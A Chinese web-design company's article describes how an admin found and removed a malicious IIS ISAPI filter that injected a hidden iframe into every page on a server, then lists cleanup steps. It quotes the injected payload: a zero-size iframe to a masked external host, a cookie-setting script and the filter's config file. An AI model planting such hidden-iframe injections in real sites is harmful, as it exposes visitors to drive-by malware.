消息: 成都市万企科技 是一家融创意,策划,设计制作于一体的专业成都网站建设 ,成都网站建设公司咨询热线028-80866098,我们提 供专业的成都网站建设,成都网站建设公司 ,成都网站制作,成都网站制作公司 ,成都网站设计公司,成都制作网站公司 ,成都网页设计公司,网页制作设计网站公 司,成都动态网站建设,成都网络网站推广 公司,成都网站优化公司。成都市万企科技有限公司 永远怀有一个感恩的心,永远珍惜公司的每一位客户,我们始终保持低调务实的 做事风格,我们专注于为大,中,小型企业提供专业,标准,优质的电子商务服 务。
成都市万企科技有限公司-网站建设-网站制作公司-企业网站建设-模板网站建设-网站推广-Google 搜索引擎
今天是:
成都市万企科技有限公司-设为首页
 设为首页
成都市万企科技有限公司-加入收藏
 加入收藏
成都市万企科技有限公司-联系我们
 联系我们
成都市万企科技有限公司-网站地图
网站地图
  最新动态
新建网站如何提高流量的五个有效...
个人站长迷茫的时候学会深刻剖析...
域名品牌对设计网站尤其重要
中小企业离不开现代信息技术
未来三十年互联网将会变成什么样
谈谈草根站长的几种赚钱模式
更多  
  网站建设技巧
[网站建设]网站产品设计:一中心...
[网站建设]浪费资源无点点击...
[网站建设]挑选VPS的几个考虑.
[网站建设]地方性门户网站推广...
[网站建设]网站登录界面优化八...
[网站建设]SEO之如何消除网站改...
[网站建设]百度如何判断网站文章...
[网站建设]SNS网站发展趋势八大...
[网站建设]如何快速的呈现我们的...
[网站建设]什么类型的网站最适合...
更多  
  网站推广技巧
[推广技巧]用正确的手段推广您的...
[推广技巧]SEO优化过的网站如何防...
[推广技巧]SEO初学者对关键词搜索...
[推广技巧]经历分享:我做SEOer发...
[推广技巧]网站优化之黑帽SEO
[推广技巧]SEO之标题优化应该注意...
更多  
  网络在各行业中应用
网络在各行业中应用 [网络应用]四川旅游步入".COM...
网络在各行业中应用 [网络应用]三地联手做鞋五年赚它...
网络在各行业中应用 [网络应用]网络在旅游业中的应用
网络在各行业中应用 [网络应用]网络在制造业中的应用
网络在各行业中应用 [网络应用]网络在政府部门中的应...
网络在各行业中应用 [网络应用]网络在医疗卫生业中应...
更多  
 
  首  页->网站建设服务->正文
 
站长在网站被挂马后的应对办法

现象是一台服务器几乎所有网站打开网页 甚至HTML网页 都出现了

《iframe src=“http://www.XXXXXXXXXXXXX.com/mmmmmmm.htm” height=0 width=0》《/iframe》 这种样式的代码 一般在头部部分杀毒软件打开会报毒

打开HTML或ASP PHP页面在源码中怎么也找不到这段代码起初会怀疑是JS,找了半天还是没有发现,连新建的HTML页面也会有这段代码~

仔细寻找问题应该在IIS上,打开IIS重新启动一次在主IIS上右键属性-----ISAPI,发现一个ISAPI扩展,没见过的,路径为:c:\windows\help\wanps.dll ,ISAP加载正常绿色状态,取消重新启动IIS,所有代码消失。

可以判断就是这个文件在作怪,提取出来就是者三个文件

wanps.ini内容为:

[Filter]

Cookie=GAG5=ABCDEFG

Redirector=C:\windows\help\wanps.txt

wanps.txt内容为:

《body》

《iframe src=“http://www.XXXXXX.com/mm.htm” height=0 width=0》《/iframe》

《script language=“javascript”》

《!--

var expires = new Date();

expires.setTime(expires.getTime() + 5 * 24* 60 * 60 * 1000);

document.cookie=“GAG5=ABCDEFG;expires=”+expires.toGMTString();

--》

《/script》

《/body》

打此为此,马算是解决了,但后门肯定已经被人家掌握了,我清除马以后,过一段时间,又被人家挂上马了。哎~~~~

在网上查到一些解决挂马的办法,附上,希望对大家有用

首先发现自己访问多个站点被挂马以后需要按以下流程操作解决

1、迅速访问www.baidu.com看BAIDU是否被挂马,用于排除自己的PC中病毒引起的问题。如果你访问www.baidu.com也是被挂马的话,那你就杀毒就可以了!熊猫烧香好象应用了类似的预防被杀掉的措施。

2、迅速登陆FTP或者进入服务器查看相关文件是否被写入了代码,如果被写入代码那就找规律清除吧,某些黑客用批量文本替换工具挂的马,所以你找到替换字符,替换回来就可以迅速解决。

3、如果以上两个方案都没解决,迅速打开IIS,查看仔细寻找 打开IIS 重新启动一次 在主IIS上 右键属性 ISAPI 发现一个ISAPI扩展 没见过的 ISAP加载正常 绿色状态 取消 重新启动IIS 所有代码消失

4、如果还没有解决,那你就可以放心了,不是你的机器被入侵了,速速告诉机房,和你同一网关下的某机器被拿下来,被设置了ARP欺骗。这个现象就是包括服务器的404页面都被挂了马。你可以在防火墙里设置一些规则来避免掉。我所说的这个方法也是现在最流行的挂马的方法!

文章来源:成都市万企科技

上一条:一套实用的网页配色方案
下一条:五个网站设计对策 让用户记住你的网站
 
 公司名称:成都市万企科技有限公司 公司名号:万企
 公司地址:中国·四川·成都市双桥路213号605室
 公司网址:http://www.wq-it.com
 公司电话:028-80866098   84391008
 服务传真:028-84391008   公司邮箱:wq-it@163.com
 公交线路:可乘20、341、106路公交车在双桥路下车即到    
主营业务:成都网站建设,成都网站制作,成都网站设计,成都网站改版,成都企业网站制作,成都网页设计,成都网站开发,成都网站优化,成都网站推广